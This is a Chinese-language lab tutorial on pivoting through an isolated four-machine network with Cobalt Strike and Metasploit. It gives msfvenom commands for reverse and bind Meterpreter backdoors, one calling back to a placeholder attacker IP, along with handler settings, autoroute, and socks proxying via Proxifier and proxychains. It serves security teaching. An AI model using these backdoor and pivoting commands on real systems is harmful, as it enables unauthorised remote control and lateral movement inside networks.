环境准备
四台虚拟机,物理机与这四台隔离( 控制面板中禁用对应的VMnet
)
网络适配器改成自定义的,(web
连一个NAT
与物理机通讯)
web:192.168.2.129 / 192.168.47.221
sql:192.168.2.128 / 192.168.3.129
file: 192.168.3.128 / 192.168.4.129
dc:192.168.4.130
测试ping
物理机只能与 NAT 的那个虚拟机 ping通
web -> sql -> file -> dc
cs
连接
reverse:反向、让目标机器主动连接你
bind:正向、你主动去找目标机器
正反向上线:
反向:B机执行exe后门,直接上线
正向:B机执行exe后门,自动监听4444端口,A机连接B机的4444端口 -> 上线
cs生成后门exe -> web虚拟机 反向连接 -> cs上线
如何让sql上线呢? 物理机无法与sql进行通讯
我们现在得到了web虚拟机 -> 能与sql进行通讯
Proxifier
代理
上线的web虚拟机 -> 代理转发Socks代理 -> 获取到端口
Proxifier设置代理 -> cs服务器IP:socks代理端口
Proxifier添加代理规则 -> 目标主机设置为192.168.2.* -> 动作添加为刚才添加的代理
现在我们再用物理机ping sql虚拟机 就OK了
ping 192.168.2.128 -> cs服务器代理 -> success
添加一个正向连接后门,在sql虚拟机中运行( 运行前没有监听对应的端口,运行后会监听端口-等待连接 )
然后,在cs服务器中进行连接 connect 192.168.2.128 4444
后面都是如此
msf
连接
与web可以通讯 -> 反向连接 -> web有sql的路由 -> 添加路由
sql正向连接 -> 添加路由 -> file正向连接 -> 添加路由 -> dc正向连接
msf
生成反向连接后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=8989 -f exe -o 8989.exe
msf
监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8989
添加路由
run autoroute -p
====> run post/multi/manage/autoroute
proxychains
代理
use auxiliary/server/socks_proxy
show options 设置端口和版本
run
再在proxifier中进行设置
proxychains curl http://192.168.2.128
msf
生成正向连接后门
msfvenom -p windows/meterpreter/bind_tcp LPORT=6666 -f exe -o 6666.exe
msf
监听
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.2.128
set lport 6666
run
原文始发于微信公众号(夜风Sec):内网初探【通讯代理】
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论